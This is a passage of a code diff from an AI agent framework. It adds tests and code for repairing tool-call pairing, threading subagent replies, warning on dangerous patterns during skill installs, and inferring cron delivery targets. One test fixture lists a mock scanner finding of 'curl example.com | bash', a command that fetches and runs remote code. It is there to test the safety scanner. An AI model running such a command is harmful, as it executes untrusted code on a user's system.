|
||||
// incomplete/malformed. We should NOT create synthetic tool_results for them,
|
||||
// as this causes API 400 errors: "unexpected tool_use_id found in tool_result blocks"
|
||||
const input = [
|
||||
{
|
||||
role: "assistant",
|
||||
content: [{ type: "toolCall", id: "call_error", name: "exec", arguments: {} }],
|
||||
stopReason: "error",
|
||||
},
|
||||
{ role: "user", content: "something went wrong" },
|
||||
] as AgentMessage[];
|
||||
|
||||
const result = repairToolUseResultPairing(input);
|
||||
|
||||
// Should NOT add synthetic tool results for errored messages
|
||||
expect(result.added).toHaveLength(0);
|
||||
// The assistant message should be passed through unchanged
|
||||
expect(result.messages[0]?.role).toBe("assistant");
|
||||
expect(result.messages[1]?.role).toBe("user");
|
||||
expect(result.messages).toHaveLength(2);
|
||||
});
|
||||
|
||||
it("skips tool call extraction for assistant messages with stopReason 'aborted'", () => {
|
||||
// When a request is aborted mid-stream, the assistant message may have incomplete
|
||||
// tool_use blocks (with partialJson). We should NOT create synthetic tool_results.
|
||||
const input = [
|
||||
{
|
||||
role: "assistant",
|
||||
content: [{ type: "toolCall", id: "call_aborted", name: "Bash", arguments: {} }],
|
||||
stopReason: "aborted",
|
||||
},
|
||||
{ role: "user", content: "retrying after abort" },
|
||||
] as AgentMessage[];
|
||||
|
||||
const result = repairToolUseResultPairing(input);
|
||||
|
||||
// Should NOT add synthetic tool results for aborted messages
|
||||
expect(result.added).toHaveLength(0);
|
||||
// Messages should be passed through without synthetic insertions
|
||||
expect(result.messages).toHaveLength(2);
|
||||
expect(result.messages[0]?.role).toBe("assistant");
|
||||
expect(result.messages[1]?.role).toBe("user");
|
||||
});
|
||||
|
||||
it("still repairs tool results for normal assistant messages with stopReason 'toolUse'", () => {
|
||||
// Normal tool calls (stopReason: "toolUse" or "stop") should still be repaired
|
||||
const input = [
|
||||
{
|
||||
role: "assistant",
|
||||
content: [{ type: "toolCall", id: "call_normal", name: "read", arguments: {} }],
|
||||
stopReason: "toolUse",
|
||||
},
|
||||
{ role: "user", content: "user message" },
|
||||
] as AgentMessage[];
|
||||
|
||||
const result = repairToolUseResultPairing(input);
|
||||
|
||||
// Should add a synthetic tool result for the missing result
|
||||
expect(result.added).toHaveLength(1);
|
||||
expect(result.added[0]?.toolCallId).toBe("call_normal");
|
||||
});
|
||||
|
||||
it("drops orphan tool results that follow an aborted assistant message", () => {
|
||||
// When an assistant message is aborted, any tool results that follow should be
|
||||
// dropped as orphans (since we skip extracting tool calls from aborted messages).
|
||||
// This addresses the edge case where a partial tool result was persisted before abort.
|
||||
const input = [
|
||||
{
|
||||
role: "assistant",
|
||||
content: [{ type: "toolCall", id: "call_aborted", name: "exec", arguments: {} }],
|
||||
stopReason: "aborted",
|
||||
},
|
||||
{
|
||||
role: "toolResult",
|
||||
toolCallId: "call_aborted",
|
||||
toolName: "exec",
|
||||
content: [{ type: "text", text: "partial result" }],
|
||||
isError: false,
|
||||
},
|
||||
{ role: "user", content: "retrying" },
|
||||
] as AgentMessage[];
|
||||
|
||||
const result = repairToolUseResultPairing(input);
|
||||
|
||||
// The orphan tool result should be dropped
|
||||
expect(result.droppedOrphanCount).toBe(1);
|
||||
expect(result.messages).toHaveLength(2);
|
||||
expect(result.messages[0]?.role).toBe("assistant");
|
||||
expect(result.messages[1]?.role).toBe("user");
|
||||
// No synthetic results should be added
|
||||
expect(result.added).toHaveLength(0);
|
||||
});
|
||||
});
|
||||
|
||||
describe("sanitizeToolCallInputs", () => {
|
||||
|
||||
@@ -213,6 +213,19 @@ export function repairToolUseResultPairing(messages: AgentMessage[]): ToolUseRep
|
||||
}
|
||||
|
||||
const assistant = msg as Extract<AgentMessage, { role: "assistant" }>;
|
||||
|
||||
// Skip tool call extraction for aborted or errored assistant messages.
|
||||
// When stopReason is "error" or "aborted", the tool_use blocks may be incomplete
|
||||
// (e.g., partialJson: true) and should not have synthetic tool_results created.
|
||||
// Creating synthetic results for incomplete tool calls causes API 400 errors:
|
||||
// "unexpected tool_use_id found in tool_result blocks"
|
||||
// See: https://github.com/openclaw/openclaw/issues/4597
|
||||
const stopReason = (assistant as { stopReason?: string }).stopReason;
|
||||
if (stopReason === "error" || stopReason === "aborted") {
|
||||
out.push(msg);
|
||||
continue;
|
||||
}
|
||||
|
||||
const toolCalls = extractToolCallsFromAssistant(assistant);
|
||||
if (toolCalls.length === 0) {
|
||||
out.push(msg);
|
||||
|
||||
99
src/agents/sessions-spawn-threadid.test.ts
Normal file
99
src/agents/sessions-spawn-threadid.test.ts
Normal file
@@ -0,0 +1,99 @@
|
||||
import { beforeEach, describe, expect, it, vi } from "vitest";
|
||||
|
||||
const callGatewayMock = vi.fn();
|
||||
vi.mock("../gateway/call.js", () => ({
|
||||
callGateway: (opts: unknown) => callGatewayMock(opts),
|
||||
}));
|
||||
|
||||
let configOverride: ReturnType<(typeof import("../config/config.js"))["loadConfig"]> = {
|
||||
session: {
|
||||
mainKey: "main",
|
||||
scope: "per-sender",
|
||||
},
|
||||
};
|
||||
|
||||
vi.mock("../config/config.js", async (importOriginal) => {
|
||||
const actual = await importOriginal<typeof import("../config/config.js")>();
|
||||
return {
|
||||
...actual,
|
||||
loadConfig: () => configOverride,
|
||||
resolveGatewayPort: () => 18789,
|
||||
};
|
||||
});
|
||||
|
||||
import "./test-helpers/fast-core-tools.js";
|
||||
import { createOpenClawTools } from "./openclaw-tools.js";
|
||||
import {
|
||||
listSubagentRunsForRequester,
|
||||
resetSubagentRegistryForTests,
|
||||
} from "./subagent-registry.js";
|
||||
|
||||
describe("sessions_spawn requesterOrigin threading", () => {
|
||||
beforeEach(() => {
|
||||
resetSubagentRegistryForTests();
|
||||
callGatewayMock.mockReset();
|
||||
configOverride = {
|
||||
session: {
|
||||
mainKey: "main",
|
||||
scope: "per-sender",
|
||||
},
|
||||
};
|
||||
|
||||
callGatewayMock.mockImplementation(async (opts: unknown) => {
|
||||
const req = opts as { method?: string };
|
||||
if (req.method === "agent") {
|
||||
return { runId: "run-1", status: "accepted", acceptedAt: 1 };
|
||||
}
|
||||
// Prevent background announce flow by returning a non-terminal status.
|
||||
if (req.method === "agent.wait") {
|
||||
return { runId: "run-1", status: "running" };
|
||||
}
|
||||
return {};
|
||||
});
|
||||
});
|
||||
|
||||
it("captures threadId in requesterOrigin", async () => {
|
||||
const tool = createOpenClawTools({
|
||||
agentSessionKey: "main",
|
||||
agentChannel: "telegram",
|
||||
agentTo: "telegram:123",
|
||||
agentThreadId: 42,
|
||||
}).find((candidate) => candidate.name === "sessions_spawn");
|
||||
if (!tool) {
|
||||
throw new Error("missing sessions_spawn tool");
|
||||
}
|
||||
|
||||
await tool.execute("call", {
|
||||
task: "do thing",
|
||||
runTimeoutSeconds: 1,
|
||||
});
|
||||
|
||||
const runs = listSubagentRunsForRequester("main");
|
||||
expect(runs).toHaveLength(1);
|
||||
expect(runs[0]?.requesterOrigin).toMatchObject({
|
||||
channel: "telegram",
|
||||
to: "telegram:123",
|
||||
threadId: 42,
|
||||
});
|
||||
});
|
||||
|
||||
it("stores requesterOrigin without threadId when none is provided", async () => {
|
||||
const tool = createOpenClawTools({
|
||||
agentSessionKey: "main",
|
||||
agentChannel: "telegram",
|
||||
agentTo: "telegram:123",
|
||||
}).find((candidate) => candidate.name === "sessions_spawn");
|
||||
if (!tool) {
|
||||
throw new Error("missing sessions_spawn tool");
|
||||
}
|
||||
|
||||
await tool.execute("call", {
|
||||
task: "do thing",
|
||||
runTimeoutSeconds: 1,
|
||||
});
|
||||
|
||||
const runs = listSubagentRunsForRequester("main");
|
||||
expect(runs).toHaveLength(1);
|
||||
expect(runs[0]?.requesterOrigin?.threadId).toBeUndefined();
|
||||
});
|
||||
});
|
||||
114
src/agents/skills-install.test.ts
Normal file
114
src/agents/skills-install.test.ts
Normal file
@@ -0,0 +1,114 @@
|
||||
import fs from "node:fs/promises";
|
||||
import os from "node:os";
|
||||
import path from "node:path";
|
||||
import { beforeEach, describe, expect, it, vi } from "vitest";
|
||||
import { installSkill } from "./skills-install.js";
|
||||
|
||||
const runCommandWithTimeoutMock = vi.fn();
|
||||
const scanDirectoryWithSummaryMock = vi.fn();
|
||||
|
||||
vi.mock("../process/exec.js", () => ({
|
||||
runCommandWithTimeout: (...args: unknown[]) => runCommandWithTimeoutMock(...args),
|
||||
}));
|
||||
|
||||
vi.mock("../security/skill-scanner.js", async (importOriginal) => {
|
||||
const actual = await importOriginal<typeof import("../security/skill-scanner.js")>();
|
||||
return {
|
||||
...actual,
|
||||
scanDirectoryWithSummary: (...args: unknown[]) => scanDirectoryWithSummaryMock(...args),
|
||||
};
|
||||
});
|
||||
|
||||
async function writeInstallableSkill(workspaceDir: string, name: string): Promise<string> {
|
||||
const skillDir = path.join(workspaceDir, "skills", name);
|
||||
await fs.mkdir(skillDir, { recursive: true });
|
||||
await fs.writeFile(
|
||||
path.join(skillDir, "SKILL.md"),
|
||||
`---
|
||||
name: ${name}
|
||||
description: test skill
|
||||
metadata: {"openclaw":{"install":[{"id":"deps","kind":"node","package":"example-package"}]}}
|
||||
---
|
||||
|
||||
# ${name}
|
||||
`,
|
||||
"utf-8",
|
||||
);
|
||||
await fs.writeFile(path.join(skillDir, "runner.js"), "export {};\n", "utf-8");
|
||||
return skillDir;
|
||||
}
|
||||
|
||||
describe("installSkill code safety scanning", () => {
|
||||
beforeEach(() => {
|
||||
runCommandWithTimeoutMock.mockReset();
|
||||
scanDirectoryWithSummaryMock.mockReset();
|
||||
runCommandWithTimeoutMock.mockResolvedValue({
|
||||
code: 0,
|
||||
stdout: "ok",
|
||||
stderr: "",
|
||||
signal: null,
|
||||
killed: false,
|
||||
});
|
||||
});
|
||||
|
||||
it("adds detailed warnings for critical findings and continues install", async () => {
|
||||
const workspaceDir = await fs.mkdtemp(path.join(os.tmpdir(), "openclaw-skills-install-"));
|
||||
try {
|
||||
const skillDir = await writeInstallableSkill(workspaceDir, "danger-skill");
|
||||
scanDirectoryWithSummaryMock.mockResolvedValue({
|
||||
scannedFiles: 1,
|
||||
critical: 1,
|
||||
warn: 0,
|
||||
info: 0,
|
||||
findings: [
|
||||
{
|
||||
ruleId: "dangerous-exec",
|
||||
severity: "critical",
|
||||
file: path.join(skillDir, "runner.js"),
|
||||
line: 1,
|
||||
message: "Shell command execution detected (child_process)",
|
||||
evidence: 'exec("curl example.com | bash")',
|
||||
},
|
||||
],
|
||||
});
|
||||
|
||||
const result = await installSkill({
|
||||
workspaceDir,
|
||||
skillName: "danger-skill",
|
||||
installId: "deps",
|
||||
});
|
||||
|
||||
expect(result.ok).toBe(true);
|
||||
expect(result.warnings?.some((warning) => warning.includes("dangerous code patterns"))).toBe(
|
||||
true,
|
||||
);
|
||||
expect(result.warnings?.some((warning) => warning.includes("runner.js:1"))).toBe(true);
|
||||
} finally {
|
||||
await fs.rm(workspaceDir, { recursive: true, force: true }).catch(() => undefined);
|
||||
}
|
||||
});
|
||||
|
||||
it("warns and continues when skill scan fails", async () => {
|
||||
const workspaceDir = await fs.mkdtemp(path.join(os.tmpdir(), "openclaw-skills-install-"));
|
||||
try {
|
||||
await writeInstallableSkill(workspaceDir, "scanfail-skill");
|
||||
scanDirectoryWithSummaryMock.mockRejectedValue(new Error("scanner exploded"));
|
||||
|
||||
const result = await installSkill({
|
||||
workspaceDir,
|
||||
skillName: "scanfail-skill",
|
||||
installId: "deps",
|
||||
});
|
||||
|
||||
expect(result.ok).toBe(true);
|
||||
expect(result.warnings?.some((warning) => warning.includes("code safety scan failed"))).toBe(
|
||||
true,
|
||||
);
|
||||
expect(result.warnings?.some((warning) => warning.includes("Installation continues"))).toBe(
|
||||
true,
|
||||
);
|
||||
} finally {
|
||||
await fs.rm(workspaceDir, { recursive: true, force: true }).catch(() => undefined);
|
||||
}
|
||||
});
|
||||
});
|
||||
@@ -7,6 +7,7 @@ import type { OpenClawConfig } from "../config/config.js";
|
||||
import { resolveBrewExecutable } from "../infra/brew.js";
|
||||
import { fetchWithSsrFGuard } from "../infra/net/fetch-guard.js";
|
||||
import { runCommandWithTimeout } from "../process/exec.js";
|
||||
import { scanDirectoryWithSummary } from "../security/skill-scanner.js";
|
||||
import { CONFIG_DIR, ensureDir, resolveUserPath } from "../utils.js";
|
||||
import {
|
||||
hasBinary,
|
||||
@@ -32,6 +33,7 @@ export type SkillInstallResult = {
|
||||
stdout: string;
|
||||
stderr: string;
|
||||
code: number | null;
|
||||
warnings?: string[];
|
||||
};
|
||||
|
||||
function isNodeReadableStream(value: unknown): value is NodeJS.ReadableStream {
|
||||
@@ -77,6 +79,57 @@ function formatInstallFailureMessage(result: {
|
||||
return `Install failed (${code}): ${summary}`;
|
||||
}
|
||||
|
||||
function withWarnings(result: SkillInstallResult, warnings: string[]): SkillInstallResult {
|
||||
if (warnings.length === 0) {
|
||||
return result;
|
||||
}
|
||||
return {
|
||||
...result,
|
||||
warnings: warnings.slice(),
|
||||
};
|
||||
}
|
||||
|
||||
function formatScanFindingDetail(
|
||||
rootDir: string,
|
||||
finding: { message: string; file: string; line: number },
|
||||
): string {
|
||||
const relativePath = path.relative(rootDir, finding.file);
|
||||
const filePath =
|
||||
relativePath && relativePath !== "." && !relativePath.startsWith("..")
|
||||
? relativePath
|
||||
: path.basename(finding.file);
|
||||
return `${finding.message} (${filePath}:${finding.line})`;
|
||||
}
|
||||
|
||||
async function collectSkillInstallScanWarnings(entry: SkillEntry): Promise<string[]> {
|
||||
const warnings: string[] = [];
|
||||
const skillName = entry.skill.name;
|
||||
const skillDir = path.resolve(entry.skill.baseDir);
|
||||
|
||||
try {
|
||||
const summary = await scanDirectoryWithSummary(skillDir);
|
||||
if (summary.critical > 0) {
|
||||
const criticalDetails = summary.findings
|
||||
.filter((finding) => finding.severity === "critical")
|
||||
.map((finding) => formatScanFindingDetail(skillDir, finding))
|
||||
.join("; ");
|
||||
warnings.push(
|
||||
`WARNING: Skill "${skillName}" contains dangerous code patterns: ${criticalDetails}`,
|
||||
);
|
||||
} else if (summary.warn > 0) {
|
||||
warnings.push(
|
||||
`Skill "${skillName}" has ${summary.warn} suspicious code pattern(s). Run "openclaw security audit --deep" for details.`,
|
||||
);
|
||||
}
|
||||
} catch (err) {
|
||||
warnings.push(
|
||||
`Skill "${skillName}" code safety scan failed (${String(err)}). Installation continues; run "openclaw security audit --deep" after install.`,
|
||||
);
|
||||
}
|
||||
|
||||
return warnings;
|
||||
}
|
||||
|
||||
function resolveInstallId(spec: SkillInstallSpec, index: number): string {
|
||||
return (spec.id ?? `${spec.kind}-${index}`).trim();
|
||||
}
|
||||
@@ -356,40 +409,51 @@ export async function installSkill(params: SkillInstallRequest): Promise<SkillIn
|
||||
}
|
||||
|
||||
const spec = findInstallSpec(entry, params.installId);
|
||||
const warnings = await collectSkillInstallScanWarnings(entry);
|
||||
if (!spec) {
|
||||
return {
|
||||
ok: false,
|
||||
message: `Installer not found: ${params.installId}`,
|
||||
stdout: "",
|
||||
stderr: "",
|
||||
code: null,
|
||||
};
|
||||
return withWarnings(
|
||||
{
|
||||
ok: false,
|
||||
message: `Installer not found: ${params.installId}`,
|
||||
stdout: "",
|
||||
stderr: "",
|
||||
code: null,
|
||||
},
|
||||
warnings,
|
||||
);
|
||||
}
|
||||
if (spec.kind === "download") {
|
||||
return await installDownloadSpec({ entry, spec, timeoutMs });
|
||||
const downloadResult = await installDownloadSpec({ entry, spec, timeoutMs });
|
||||
return withWarnings(downloadResult, warnings);
|
||||
}
|
||||
|
||||
const prefs = resolveSkillsInstallPreferences(params.config);
|
||||
const command = buildInstallCommand(spec, prefs);
|
||||
if (command.error) {
|
||||
return {
|
||||
ok: false,
|
||||
message: command.error,
|
||||
stdout: "",
|
||||
stderr: "",
|
||||
code: null,
|
||||
};
|
||||
return withWarnings(
|
||||
{
|
||||
ok: false,
|
||||
message: command.error,
|
||||
stdout: "",
|
||||
stderr: "",
|
||||
code: null,
|
||||
},
|
||||
warnings,
|
||||
);
|
||||
}
|
||||
|
||||
const brewExe = hasBinary("brew") ? "brew" : resolveBrewExecutable();
|
||||
if (spec.kind === "brew" && !brewExe) {
|
||||
return {
|
||||
ok: false,
|
||||
message: "brew not installed",
|
||||
stdout: "",
|
||||
stderr: "",
|
||||
code: null,
|
||||
};
|
||||
return withWarnings(
|
||||
{
|
||||
ok: false,
|
||||
message: "brew not installed",
|
||||
stdout: "",
|
||||
stderr: "",
|
||||
code: null,
|
||||
},
|
||||
warnings,
|
||||
);
|
||||
}
|
||||
if (spec.kind === "uv" && !hasBinary("uv")) {
|
||||
if (brewExe) {
|
||||
@@ -397,32 +461,41 @@ export async function installSkill(params: SkillInstallRequest): Promise<SkillIn
|
||||
timeoutMs,
|
||||
});
|
||||
if (brewResult.code !== 0) {
|
||||
return {
|
||||
ok: false,
|
||||
message: "Failed to install uv (brew)",
|
||||
stdout: brewResult.stdout.trim(),
|
||||
stderr: brewResult.stderr.trim(),
|
||||
code: brewResult.code,
|
||||
};
|
||||
return withWarnings(
|
||||
{
|
||||
ok: false,
|
||||
message: "Failed to install uv (brew)",
|
||||
stdout: brewResult.stdout.trim(),
|
||||
stderr: brewResult.stderr.trim(),
|
||||
code: brewResult.code,
|
||||
},
|
||||
warnings,
|
||||
);
|
||||
}
|
||||
} else {
|
||||
return {
|
||||
ok: false,
|
||||
message: "uv not installed (install via brew)",
|
||||
stdout: "",
|
||||
stderr: "",
|
||||
code: null,
|
||||
};
|
||||
return withWarnings(
|
||||
{
|
||||
ok: false,
|
||||
message: "uv not installed (install via brew)",
|
||||
stdout: "",
|
||||
stderr: "",
|
||||
code: null,
|
||||
},
|
||||
warnings,
|
||||
);
|
||||
}
|
||||
}
|
||||
if (!command.argv || command.argv.length === 0) {
|
||||
return {
|
||||
ok: false,
|
||||
message: "invalid install command",
|
||||
stdout: "",
|
||||
stderr: "",
|
||||
code: null,
|
||||
};
|
||||
return withWarnings(
|
||||
{
|
||||
ok: false,
|
||||
message: "invalid install command",
|
||||
stdout: "",
|
||||
stderr: "",
|
||||
code: null,
|
||||
},
|
||||
warnings,
|
||||
);
|
||||
}
|
||||
|
||||
if (spec.kind === "brew" && brewExe && command.argv[0] === "brew") {
|
||||
@@ -435,22 +508,28 @@ export async function installSkill(params: SkillInstallRequest): Promise<SkillIn
|
||||
timeoutMs,
|
||||
});
|
||||
if (brewResult.code !== 0) {
|
||||
return {
|
||||
ok: false,
|
||||
message: "Failed to install go (brew)",
|
||||
stdout: brewResult.stdout.trim(),
|
||||
stderr: brewResult.stderr.trim(),
|
||||
code: brewResult.code,
|
||||
};
|
||||
return withWarnings(
|
||||
{
|
||||
ok: false,
|
||||
message: "Failed to install go (brew)",
|
||||
stdout: brewResult.stdout.trim(),
|
||||
stderr: brewResult.stderr.trim(),
|
||||
code: brewResult.code,
|
||||
},
|
||||
warnings,
|
||||
);
|
||||
}
|
||||
} else {
|
||||
return {
|
||||
ok: false,
|
||||
message: "go not installed (install via brew)",
|
||||
stdout: "",
|
||||
stderr: "",
|
||||
code: null,
|
||||
};
|
||||
return withWarnings(
|
||||
{
|
||||
ok: false,
|
||||
message: "go not installed (install via brew)",
|
||||
stdout: "",
|
||||
stderr: "",
|
||||
code: null,
|
||||
},
|
||||
warnings,
|
||||
);
|
||||
}
|
||||
}
|
||||
|
||||
@@ -479,11 +558,14 @@ export async function installSkill(params: SkillInstallRequest): Promise<SkillIn
|
||||
})();
|
||||
|
||||
const success = result.code === 0;
|
||||
return {
|
||||
ok: success,
|
||||
message: success ? "Installed" : formatInstallFailureMessage(result),
|
||||
stdout: result.stdout.trim(),
|
||||
stderr: result.stderr.trim(),
|
||||
code: result.code,
|
||||
};
|
||||
return withWarnings(
|
||||
{
|
||||
ok: success,
|
||||
message: success ? "Installed" : formatInstallFailureMessage(result),
|
||||
stdout: result.stdout.trim(),
|
||||
stderr: result.stderr.trim(),
|
||||
code: result.code,
|
||||
},
|
||||
warnings,
|
||||
);
|
||||
}
|
||||
|
||||
@@ -198,6 +198,85 @@ describe("subagent announce formatting", () => {
|
||||
expect(call?.params?.accountId).toBe("kev");
|
||||
});
|
||||
|
||||
it("includes threadId when origin has an active topic/thread", async () => {
|
||||
const { runSubagentAnnounceFlow } = await import("./subagent-announce.js");
|
||||
embeddedRunMock.isEmbeddedPiRunActive.mockReturnValue(true);
|
||||
embeddedRunMock.isEmbeddedPiRunStreaming.mockReturnValue(false);
|
||||
sessionStore = {
|
||||
"agent:main:main": {
|
||||
sessionId: "session-thread",
|
||||
lastChannel: "telegram",
|
||||
lastTo: "telegram:123",
|
||||
lastThreadId: 42,
|
||||
queueMode: "collect",
|
||||
queueDebounceMs: 0,
|
||||
},
|
||||
};
|
||||
|
||||
const didAnnounce = await runSubagentAnnounceFlow({
|
||||
childSessionKey: "agent:main:subagent:test",
|
||||
childRunId: "run-thread",
|
||||
requesterSessionKey: "main",
|
||||
requesterDisplayKey: "main",
|
||||
task: "do thing",
|
||||
timeoutMs: 1000,
|
||||
cleanup: "keep",
|
||||
waitForCompletion: false,
|
||||
startedAt: 10,
|
||||
endedAt: 20,
|
||||
outcome: { status: "ok" },
|
||||
});
|
||||
|
||||
expect(didAnnounce).toBe(true);
|
||||
await expect.poll(() => agentSpy.mock.calls.length).toBe(1);
|
||||
|
||||
const call = agentSpy.mock.calls[0]?.[0] as { params?: Record<string, unknown> };
|
||||
expect(call?.params?.channel).toBe("telegram");
|
||||
expect(call?.params?.to).toBe("telegram:123");
|
||||
expect(call?.params?.threadId).toBe("42");
|
||||
});
|
||||
|
||||
it("prefers requesterOrigin.threadId over session entry threadId", async () => {
|
||||
const { runSubagentAnnounceFlow } = await import("./subagent-announce.js");
|
||||
embeddedRunMock.isEmbeddedPiRunActive.mockReturnValue(true);
|
||||
embeddedRunMock.isEmbeddedPiRunStreaming.mockReturnValue(false);
|
||||
sessionStore = {
|
||||
"agent:main:main": {
|
||||
sessionId: "session-thread-override",
|
||||
lastChannel: "telegram",
|
||||
lastTo: "telegram:123",
|
||||
lastThreadId: 42,
|
||||
queueMode: "collect",
|
||||
queueDebounceMs: 0,
|
||||
},
|
||||
};
|
||||
|
||||
const didAnnounce = await runSubagentAnnounceFlow({
|
||||
childSessionKey: "agent:main:subagent:test",
|
||||
childRunId: "run-thread-override",
|
||||
requesterSessionKey: "main",
|
||||
requesterDisplayKey: "main",
|
||||
requesterOrigin: {
|
||||
channel: "telegram",
|
||||
to: "telegram:123",
|
||||
threadId: 99,
|
||||
},
|
||||
task: "do thing",
|
||||
timeoutMs: 1000,
|
||||
cleanup: "keep",
|
||||
waitForCompletion: false,
|
||||
startedAt: 10,
|
||||
endedAt: 20,
|
||||
outcome: { status: "ok" },
|
||||
});
|
||||
|
||||
expect(didAnnounce).toBe(true);
|
||||
await expect.poll(() => agentSpy.mock.calls.length).toBe(1);
|
||||
|
||||
const call = agentSpy.mock.calls[0]?.[0] as { params?: Record<string, unknown> };
|
||||
expect(call?.params?.threadId).toBe("99");
|
||||
});
|
||||
|
||||
it("splits collect-mode queues when accountId differs", async () => {
|
||||
const { runSubagentAnnounceFlow } = await import("./subagent-announce.js");
|
||||
embeddedRunMock.isEmbeddedPiRunActive.mockReturnValue(true);
|
||||
|
||||
@@ -233,4 +233,97 @@ describe("cron tool", () => {
|
||||
expect(call.method).toBe("cron.add");
|
||||
expect(call.params?.agentId).toBeNull();
|
||||
});
|
||||
|
||||
it("infers delivery from threaded session keys", async () => {
|
||||
callGatewayMock.mockResolvedValueOnce({ ok: true });
|
||||
|
||||
const tool = createCronTool({
|
||||
agentSessionKey: "agent:main:slack:channel:general:thread:1699999999.0001",
|
||||
});
|
||||
await tool.execute("call-thread", {
|
||||
action: "add",
|
||||
job: {
|
||||
name: "reminder",
|
||||
schedule: { at: new Date(123).toISOString() },
|
||||
payload: { kind: "agentTurn", message: "hello" },
|
||||
},
|
||||
});
|
||||
|
||||
const call = callGatewayMock.mock.calls[0]?.[0] as {
|
||||
params?: { delivery?: { mode?: string; channel?: string; to?: string } };
|
||||
};
|
||||
expect(call?.params?.delivery).toEqual({
|
||||
mode: "announce",
|
||||
channel: "slack",
|
||||
to: "general",
|
||||
});
|
||||
});
|
||||
|
||||
it("preserves telegram forum topics when inferring delivery", async () => {
|
||||
callGatewayMock.mockResolvedValueOnce({ ok: true });
|
||||
|
||||
const tool = createCronTool({
|
||||
agentSessionKey: "agent:main:telegram:group:-1001234567890:topic:99",
|
||||
});
|
||||
await tool.execute("call-telegram-topic", {
|
||||
action: "add",
|
||||
job: {
|
||||
name: "reminder",
|
||||
schedule: { at: new Date(123).toISOString() },
|
||||
payload: { kind: "agentTurn", message: "hello" },
|
||||
},
|
||||
});
|
||||
|
||||
const call = callGatewayMock.mock.calls[0]?.[0] as {
|
||||
params?: { delivery?: { mode?: string; channel?: string; to?: string } };
|
||||
};
|
||||
expect(call?.params?.delivery).toEqual({
|
||||
mode: "announce",
|
||||
channel: "telegram",
|
||||
to: "-1001234567890:topic:99",
|
||||
});
|
||||
});
|
||||
|
||||
it("infers delivery when delivery is null", async () => {
|
||||
callGatewayMock.mockResolvedValueOnce({ ok: true });
|
||||
|
||||
const tool = createCronTool({ agentSessionKey: "agent:main:dm:alice" });
|
||||
await tool.execute("call-null-delivery", {
|
||||
action: "add",
|
||||
job: {
|
||||
name: "reminder",
|
||||
schedule: { at: new Date(123).toISOString() },
|
||||
payload: { kind: "agentTurn", message: "hello" },
|
||||
delivery: null,
|
||||
},
|
||||
});
|
||||
|
||||
const call = callGatewayMock.mock.calls[0]?.[0] as {
|
||||
params?: { delivery?: { mode?: string; channel?: string; to?: string } };
|
||||
};
|
||||
expect(call?.params?.delivery).toEqual({
|
||||
mode: "announce",
|
||||
to: "alice",
|
||||
});
|
||||
});
|
||||
|
||||
it("does not infer delivery when mode is none", async () => {
|
||||
callGatewayMock.mockResolvedValueOnce({ ok: true });
|
||||
|
||||
const tool = createCronTool({ agentSessionKey: "agent:main:discord:dm:buddy" });
|
||||
await tool.execute("call-none", {
|
||||
action: "add",
|
||||
job: {
|
||||
name: "reminder",
|
||||
schedule: { at: new Date(123).toISOString() },
|
||||
payload: { kind: "agentTurn", message: "hello" },
|
||||
delivery: { mode: "none" },
|
||||
},
|
||||
});
|
||||
|
||||
const call = callGatewayMock.mock.calls[0]?.[0] as {
|
||||
params?: { delivery?: { mode?: string; channel?: string; to?: string } };
|
||||
};
|
||||
expect(call?.params?.delivery).toEqual({ mode: "none" });
|
||||
});
|
||||
});
|
||||
|
||||
@@ -1,6 +1,8 @@
|
||||
import { Type } from "@sinclair/typebox";
|
||||
import type { CronDelivery, CronMessageChannel } from "../../cron/types.js";
|
||||
import { loadConfig } from "../../config/config.js";
|
||||
import { normalizeCronJobCreate, normalizeCronJobPatch } from "../../cron/normalize.js";
|
||||
import { parseAgentSessionKey } from "../../sessions/session-key-utils.js";
|
||||
import { truncateUtf16Safe } from "../../utils.js";
|
||||
import { resolveSessionAgentId } from "../agent-scope.js";
|
||||
import { optionalStringEnum, stringEnum } from "../schema/typebox.js";
|
||||
@@ -153,6 +155,72 @@ async function buildReminderContextLines(params: {
|
||||
}
|
||||
}
|
||||
|
||||
function isRecord(value: unknown): value is Record<string, unknown> {
|
||||
return typeof value === "object" && value !== null && !Array.isArray(value);
|
||||
}
|
||||
|
||||
function stripThreadSuffixFromSessionKey(sessionKey: string): string {
|
||||
const normalized = sessionKey.toLowerCase();
|
||||
const idx = normalized.lastIndexOf(":thread:");
|
||||
if (idx <= 0) {
|
||||
return sessionKey;
|
||||
}
|
||||
const parent = sessionKey.slice(0, idx).trim();
|
||||
return parent ? parent : sessionKey;
|
||||
}
|
||||
|
||||
function inferDeliveryFromSessionKey(agentSessionKey?: string): CronDelivery | null {
|
||||
const rawSessionKey = agentSessionKey?.trim();
|
||||
if (!rawSessionKey) {
|
||||
return null;
|
||||
}
|
||||
const parsed = parseAgentSessionKey(stripThreadSuffixFromSessionKey(rawSessionKey));
|
||||
if (!parsed || !parsed.rest) {
|
||||
return null;
|
||||
}
|
||||
const parts = parsed.rest.split(":").filter(Boolean);
|
||||
if (parts.length === 0) {
|
||||
return null;
|
||||
}
|
||||
const head = parts[0]?.trim().toLowerCase();
|
||||
if (!head || head === "main" || head === "subagent" || head === "acp") {
|
||||
return null;
|
||||
}
|
||||
|
||||
// buildAgentPeerSessionKey encodes peers as:
|
||||
// - dm:<peerId>
|
||||
// - <channel>:dm:<peerId>
|
||||
// - <channel>:<accountId>:dm:<peerId>
|
||||
// - <channel>:group:<peerId>
|
||||
// - <channel>:channel:<peerId>
|
||||
// Threaded sessions append :thread:<id>, which we strip so delivery targets the parent peer.
|
||||
// NOTE: Telegram forum topics encode as <chatId>:topic:<topicId> and should be preserved.
|
||||
const markerIndex = parts.findIndex(
|
||||
(part) => part === "dm" || part === "group" || part === "channel",
|
||||
);
|
||||
if (markerIndex === -1) {
|
||||
return null;
|
||||
}
|
||||
const peerId = parts
|
||||
.slice(markerIndex + 1)
|
||||
.join(":")
|
||||
.trim();
|
||||
if (!peerId) {
|
||||
return null;
|
||||
}
|
||||
|
||||
let channel: CronMessageChannel | undefined;
|
||||
if (markerIndex >= 1) {
|
||||
channel = parts[0]?.trim().toLowerCase() as CronMessageChannel;
|
||||
}
|
||||
|
||||
const delivery: CronDelivery = { mode: "announce", to: peerId };
|
||||
if (channel) {
|
||||
delivery.channel = channel;
|
||||
}
|
||||
return delivery;
|
||||
}
|
||||
|
||||
export function createCronTool(opts?: CronToolOptions): AnyAgentTool {
|
||||
return {
|
||||
label: "Cron",
|
||||
@@ -243,6 +311,35 @@ Use jobId as the canonical identifier; id is accepted for compatibility. Use con
|
||||
(job as { agentId?: string }).agentId = agentId;
|
||||
}
|
||||
}
|
||||
|
||||
